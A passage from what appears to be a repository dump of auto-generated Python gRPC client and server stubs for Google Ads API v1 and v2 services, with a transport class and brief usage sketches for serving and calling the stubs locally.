'/google.ads.googleads.v1.services.SharedSetService/GetSharedSet',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.GetSharedSetRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_shared__set__pb2.SharedSet.FromString,
)
self.MutateSharedSets = channel.unary_unary(
'/google.ads.googleads.v1.services.SharedSetService/MutateSharedSets',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.MutateSharedSetsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.MutateSharedSetsResponse.FromString,
)
class SharedSetServiceServicer(object):
"""Proto file describing the Shared Set service.
Service to manage shared sets.
"""
def GetSharedSet(self, request, context):
"""Returns the requested shared set in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateSharedSets(self, request, context):
"""Creates, updates, or removes shared sets. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SharedSetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetSharedSet': grpc.unary_unary_rpc_method_handler(
servicer.GetSharedSet,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.GetSharedSetRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_shared__set__pb2.SharedSet.SerializeToString,
),
'MutateSharedSets': grpc.unary_unary_rpc_method_handler(
servicer.MutateSharedSets,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.MutateSharedSetsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.MutateSharedSetsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.SharedSetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/user_list_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import user_list_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__list__pb2
from google.ads.google_ads.v1.proto.services import user_list_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2
class UserListServiceStub(object):
"""Proto file describing the User List service.
Service to manage user lists.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetUserList = channel.unary_unary(
'/google.ads.googleads.v1.services.UserListService/GetUserList',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.GetUserListRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__list__pb2.UserList.FromString,
)
self.MutateUserLists = channel.unary_unary(
'/google.ads.googleads.v1.services.UserListService/MutateUserLists',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.MutateUserListsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.MutateUserListsResponse.FromString,
)
class UserListServiceServicer(object):
"""Proto file describing the User List service.
Service to manage user lists.
"""
def GetUserList(self, request, context):
"""Returns the requested user list.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateUserLists(self, request, context):
"""Creates or updates user lists. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_UserListServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetUserList': grpc.unary_unary_rpc_method_handler(
servicer.GetUserList,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.GetUserListRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__list__pb2.UserList.SerializeToString,
),
'MutateUserLists': grpc.unary_unary_rpc_method_handler(
servicer.MutateUserLists,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.MutateUserListsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.MutateUserListsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.UserListService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: services/transports/google_ads_service_grpc_transport.py
```python
import google.api_core.grpc_helpers
from google.ads.google_ads.v1.proto.services import google_ads_service_pb2_grpc
class GoogleAdsServiceGrpcTransport(object):
"""gRPC transport class providing stubs for
google.ads.googleads.v1.services GoogleAdsService API.
The transport provides access to the raw gRPC stubs,
which can be used to take advantage of advanced
features of gRPC.
"""
# The scopes needed to make gRPC calls to all of the methods defined
# in this service.
_OAUTH_SCOPES = ()
def __init__(self,
channel=None,
credentials=None,
address='googleads.googleapis.com:443'):
"""Instantiate the transport class.
Args:
channel (grpc.Channel): A ``Channel`` instance through
which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
address (str): The address where the service is hosted.
"""
# If both `channel` and `credentials` are specified, raise an
# exception (channels come with credentials baked in already).
if channel is not None and credentials is not None:
raise ValueError(
'The `channel` and `credentials` arguments are mutually '
'exclusive.', )
# Create the channel.
if channel is None:
channel = self.create_channel(
address=address,
credentials=credentials,
)
self._channel = channel
# gRPC uses objects called "stubs" that are bound to the
# channel and provide a basic method for each RPC.
self._stubs = {
'google_ads_service_stub': google_ads_service_pb2_grpc.GoogleAdsServiceStub(channel),
}
@classmethod
def create_channel(
cls,
address='googleads.googleapis.com:443',
credentials=None,
**kwargs):
"""Create and return a gRPC channel object.
Args:
address (str): The host for the channel to use.
credentials (~.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
kwargs (dict): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return google.api_core.grpc_helpers.create_channel(
address,
credentials=credentials,
scopes=cls._OAUTH_SCOPES,
**kwargs
)
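# Illustrative usage (a sketch; `oauth2_credentials` is an assumption and is
# not defined in this module):
#   channel = GoogleAdsServiceGrpcTransport.create_channel(
#       credentials=oauth2_credentials)
#   transport = GoogleAdsServiceGrpcTransport(channel=channel)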
@property
def channel(self):
"""The gRPC channel used by the transport.
Returns:
grpc.Channel: A gRPC channel object.
"""
return self._channel
@property
def search(self):
"""Return the gRPC stub for :meth:`GoogleAdsServiceClient.search`.
Returns all rows that match the search query.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['google_ads_service_stub'].Search
@property
def mutate(self):
"""Return the gRPC stub for :meth:`GoogleAdsServiceClient.mutate`.
Creates, updates, or removes resources. This method supports atomic
transactions with multiple types of resources. For example, you can
atomically create a campaign and a campaign budget, or perform up to
thousands of mutates atomically.
This method is essentially a wrapper around a series of mutate methods.
The only features it offers over calling those methods directly are:
- Atomic transactions
- Temp resource names (described below)
- Somewhat reduced latency over making a series of mutate calls.
Note: Only resources that support atomic transactions are included, so
this method can't replace all calls to individual services.
## Atomic Transaction Benefits
Atomicity makes error handling much easier. If you're making a series of
changes and one fails, it can leave your account in an inconsistent
state. With atomicity, you either reach the desired state directly, or
the request fails and you can retry.
## Temp Resource Names
Temp resource names are a special type of resource name used to create a
resource and reference that resource in the same request. For example,
if a campaign budget is created with 'resource_name' equal to
'customers/123/campaignBudgets/-1', that resource name can be reused in
the 'Campaign.budget' field in the same request. That way, the two
resources are created and linked atomically.
To create a temp resource name, put a negative number in the part of the
name that the server would normally allocate.
Note:
- Resources must be created with a temp name before the name can be reused.
For example, the previous CampaignBudget+Campaign example would fail if the
mutate order was reversed.
- Temp names are not remembered across requests.
- There's no limit to the number of temp names in a request.
- Each temp name must use a unique negative number, even if the resource
types differ.
## Latency
It's important to group mutates by resource type or the request may time
out and fail. Latency is roughly equal to a series of calls to
individual mutate methods, where each change in resource type is a new
call. For example, mutating 10 campaigns then 10 ad groups is like 2
calls, while mutating 1 campaign, 1 ad group, 1 campaign, 1 ad group is
like 4 calls.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['google_ads_service_stub'].Mutate
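# Illustrative sketch of the temp resource name pattern described above
# (hypothetical, simplified operations; real requests use the MutateOperation
# messages from the generated protos, so field names may differ):
#   budget_operation.create.resource_name = 'customers/123/campaignBudgets/-1'
#   campaign_operation.create.campaign_budget.value = 'customers/123/campaignBudgets/-1'
# Both operations can then be sent in a single Mutate request so the budget
# and the campaign referencing it are created atomically.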
```
#### File: proto/services/ad_group_bid_modifier_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import ad_group_bid_modifier_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_ad__group__bid__modifier__pb2
from google.ads.google_ads.v2.proto.services import ad_group_bid_modifier_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2
class AdGroupBidModifierServiceStub(object):
"""Proto file describing the Ad Group Bid Modifier service.
Service to manage ad group bid modifiers.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetAdGroupBidModifier = channel.unary_unary(
'/google.ads.googleads.v2.services.AdGroupBidModifierService/GetAdGroupBidModifier',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.GetAdGroupBidModifierRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_ad__group__bid__modifier__pb2.AdGroupBidModifier.FromString,
)
self.MutateAdGroupBidModifiers = channel.unary_unary(
'/google.ads.googleads.v2.services.AdGroupBidModifierService/MutateAdGroupBidModifiers',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.MutateAdGroupBidModifiersRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.MutateAdGroupBidModifiersResponse.FromString,
)
class AdGroupBidModifierServiceServicer(object):
"""Proto file describing the Ad Group Bid Modifier service.
Service to manage ad group bid modifiers.
"""
def GetAdGroupBidModifier(self, request, context):
"""Returns the requested ad group bid modifier in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateAdGroupBidModifiers(self, request, context):
"""Creates, updates, or removes ad group bid modifiers.
Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AdGroupBidModifierServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetAdGroupBidModifier': grpc.unary_unary_rpc_method_handler(
servicer.GetAdGroupBidModifier,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.GetAdGroupBidModifierRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_ad__group__bid__modifier__pb2.AdGroupBidModifier.SerializeToString,
),
'MutateAdGroupBidModifiers': grpc.unary_unary_rpc_method_handler(
servicer.MutateAdGroupBidModifiers,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.MutateAdGroupBidModifiersRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.MutateAdGroupBidModifiersResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.AdGroupBidModifierService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/campaign_extension_setting_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import campaign_extension_setting_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__extension__setting__pb2
from google.ads.google_ads.v2.proto.services import campaign_extension_setting_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2
class CampaignExtensionSettingServiceStub(object):
"""Proto file describing the CampaignExtensionSetting service.
Service to manage campaign extension settings.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCampaignExtensionSetting = channel.unary_unary(
'/google.ads.googleads.v2.services.CampaignExtensionSettingService/GetCampaignExtensionSetting',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.GetCampaignExtensionSettingRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__extension__setting__pb2.CampaignExtensionSetting.FromString,
)
self.MutateCampaignExtensionSettings = channel.unary_unary(
'/google.ads.googleads.v2.services.CampaignExtensionSettingService/MutateCampaignExtensionSettings',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.MutateCampaignExtensionSettingsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.MutateCampaignExtensionSettingsResponse.FromString,
)
class CampaignExtensionSettingServiceServicer(object):
"""Proto file describing the CampaignExtensionSetting service.
Service to manage campaign extension settings.
"""
def GetCampaignExtensionSetting(self, request, context):
"""Returns the requested campaign extension setting in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateCampaignExtensionSettings(self, request, context):
"""Creates, updates, or removes campaign extension settings. Operation
statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CampaignExtensionSettingServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCampaignExtensionSetting': grpc.unary_unary_rpc_method_handler(
servicer.GetCampaignExtensionSetting,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.GetCampaignExtensionSettingRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__extension__setting__pb2.CampaignExtensionSetting.SerializeToString,
),
'MutateCampaignExtensionSettings': grpc.unary_unary_rpc_method_handler(
servicer.MutateCampaignExtensionSettings,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.MutateCampaignExtensionSettingsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.MutateCampaignExtensionSettingsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.CampaignExtensionSettingService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/distance_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import distance_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_distance__view__pb2
from google.ads.google_ads.v2.proto.services import distance_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_distance__view__service__pb2
class DistanceViewServiceStub(object):
"""Proto file describing the Distance View service.
Service to fetch distance views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetDistanceView = channel.unary_unary(
'/google.ads.googleads.v2.services.DistanceViewService/GetDistanceView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_distance__view__service__pb2.GetDistanceViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_distance__view__pb2.DistanceView.FromString,
)
class DistanceViewServiceServicer(object):
"""Proto file describing the Distance View service.
Service to fetch distance views.
"""
def GetDistanceView(self, request, context):
"""Returns the attributes of the requested distance view.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DistanceViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetDistanceView': grpc.unary_unary_rpc_method_handler(
servicer.GetDistanceView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_distance__view__service__pb2.GetDistanceViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_distance__view__pb2.DistanceView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.DistanceViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
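The generated `*_pb2_grpc.py` modules above all share the same stub / servicer / registration shape. As a hedged sketch (not part of the library), the DistanceView pieces could be hosted on a local gRPC server as below; the import path mirrors the module's own imports, the port and worker count are illustrative, and a real servicer would override `GetDistanceView` instead of inheriting the UNIMPLEMENTED default.
```python
# Minimal sketch: serve the generated DistanceViewService locally.
from concurrent import futures

import grpc

from google.ads.google_ads.v2.proto.services.distance_view_service_pb2_grpc import (
    DistanceViewServiceServicer,
    add_DistanceViewServiceServicer_to_server,
)

server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))  # worker count is illustrative
add_DistanceViewServiceServicer_to_server(DistanceViewServiceServicer(), server)
server.add_insecure_port('[::]:50051')  # port is illustrative
server.start()
server.wait_for_termination()
```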
#### File: proto/services/keyword_plan_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import keyword_plan_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__plan__pb2
from google.ads.google_ads.v2.proto.services import keyword_plan_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2
class KeywordPlanServiceStub(object):
"""Proto file describing the keyword plan service.
Service to manage keyword plans.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetKeywordPlan = channel.unary_unary(
'/google.ads.googleads.v2.services.KeywordPlanService/GetKeywordPlan',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GetKeywordPlanRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__plan__pb2.KeywordPlan.FromString,
)
self.MutateKeywordPlans = channel.unary_unary(
'/google.ads.googleads.v2.services.KeywordPlanService/MutateKeywordPlans',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.MutateKeywordPlansRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.MutateKeywordPlansResponse.FromString,
)
self.GenerateForecastMetrics = channel.unary_unary(
'/google.ads.googleads.v2.services.KeywordPlanService/GenerateForecastMetrics',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateForecastMetricsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateForecastMetricsResponse.FromString,
)
self.GenerateHistoricalMetrics = channel.unary_unary(
'/google.ads.googleads.v2.services.KeywordPlanService/GenerateHistoricalMetrics',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateHistoricalMetricsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateHistoricalMetricsResponse.FromString,
)
class KeywordPlanServiceServicer(object):
"""Proto file describing the keyword plan service.
Service to manage keyword plans.
"""
def GetKeywordPlan(self, request, context):
"""Returns the requested plan in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateKeywordPlans(self, request, context):
"""Creates, updates, or removes keyword plans. Operation statuses are
returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GenerateForecastMetrics(self, request, context):
"""Returns the requested Keyword Plan forecasts.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GenerateHistoricalMetrics(self, request, context):
"""Returns the requested Keyword Plan historical metrics.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_KeywordPlanServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetKeywordPlan': grpc.unary_unary_rpc_method_handler(
servicer.GetKeywordPlan,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GetKeywordPlanRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__plan__pb2.KeywordPlan.SerializeToString,
),
'MutateKeywordPlans': grpc.unary_unary_rpc_method_handler(
servicer.MutateKeywordPlans,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.MutateKeywordPlansRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.MutateKeywordPlansResponse.SerializeToString,
),
'GenerateForecastMetrics': grpc.unary_unary_rpc_method_handler(
servicer.GenerateForecastMetrics,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateForecastMetricsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateForecastMetricsResponse.SerializeToString,
),
'GenerateHistoricalMetrics': grpc.unary_unary_rpc_method_handler(
servicer.GenerateHistoricalMetrics,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateHistoricalMetricsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateHistoricalMetricsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.KeywordPlanService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
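On the client side, the generated stub is constructed from a `grpc.Channel`. A minimal sketch of calling `GetKeywordPlan` directly through the stub follows; the channel target and resource name are illustrative, and real Google Ads traffic goes through the authenticated `GoogleAdsClient` rather than an insecure channel.
```python
# Sketch only: drive the generated KeywordPlanService stub over a plain channel.
import grpc

from google.ads.google_ads.v2.proto.services import (
    keyword_plan_service_pb2,
    keyword_plan_service_pb2_grpc,
)

channel = grpc.insecure_channel('localhost:50051')  # illustrative target
stub = keyword_plan_service_pb2_grpc.KeywordPlanServiceStub(channel)

request = keyword_plan_service_pb2.GetKeywordPlanRequest()
request.resource_name = 'customers/1234567890/keywordPlans/111'  # illustrative resource name
plan = stub.GetKeywordPlan(request)
```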
#### File: proto/services/keyword_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import keyword_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__view__pb2
from google.ads.google_ads.v2.proto.services import keyword_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__view__service__pb2
class KeywordViewServiceStub(object):
"""Proto file describing the Keyword View service.
Service to manage keyword views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetKeywordView = channel.unary_unary(
'/google.ads.googleads.v2.services.KeywordViewService/GetKeywordView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__view__service__pb2.GetKeywordViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__view__pb2.KeywordView.FromString,
)
class KeywordViewServiceServicer(object):
"""Proto file describing the Keyword View service.
Service to manage keyword views.
"""
def GetKeywordView(self, request, context):
"""Returns the requested keyword view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_KeywordViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetKeywordView': grpc.unary_unary_rpc_method_handler(
servicer.GetKeywordView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__view__service__pb2.GetKeywordViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__view__pb2.KeywordView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.KeywordViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/landing_page_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import landing_page_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_landing__page__view__pb2
from google.ads.google_ads.v2.proto.services import landing_page_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_landing__page__view__service__pb2
class LandingPageViewServiceStub(object):
"""Proto file describing the landing page view service.
Service to fetch landing page views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetLandingPageView = channel.unary_unary(
'/google.ads.googleads.v2.services.LandingPageViewService/GetLandingPageView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_landing__page__view__service__pb2.GetLandingPageViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_landing__page__view__pb2.LandingPageView.FromString,
)
class LandingPageViewServiceServicer(object):
"""Proto file describing the landing page view service.
Service to fetch landing page views.
"""
def GetLandingPageView(self, request, context):
"""Returns the requested landing page view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_LandingPageViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetLandingPageView': grpc.unary_unary_rpc_method_handler(
servicer.GetLandingPageView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_landing__page__view__service__pb2.GetLandingPageViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_landing__page__view__pb2.LandingPageView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.LandingPageViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/managed_placement_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import managed_placement_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_managed__placement__view__pb2
from google.ads.google_ads.v2.proto.services import managed_placement_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_managed__placement__view__service__pb2
class ManagedPlacementViewServiceStub(object):
"""Proto file describing the Managed Placement View service.
Service to manage Managed Placement views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetManagedPlacementView = channel.unary_unary(
'/google.ads.googleads.v2.services.ManagedPlacementViewService/GetManagedPlacementView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_managed__placement__view__service__pb2.GetManagedPlacementViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_managed__placement__view__pb2.ManagedPlacementView.FromString,
)
class ManagedPlacementViewServiceServicer(object):
"""Proto file describing the Managed Placement View service.
Service to manage Managed Placement views.
"""
def GetManagedPlacementView(self, request, context):
"""Returns the requested Managed Placement view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ManagedPlacementViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetManagedPlacementView': grpc.unary_unary_rpc_method_handler(
servicer.GetManagedPlacementView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_managed__placement__view__service__pb2.GetManagedPlacementViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_managed__placement__view__pb2.ManagedPlacementView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.ManagedPlacementViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/media_file_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import media_file_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_media__file__pb2
from google.ads.google_ads.v2.proto.services import media_file_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2
class MediaFileServiceStub(object):
"""Proto file describing the Media File service.
Service to manage media files.
"""
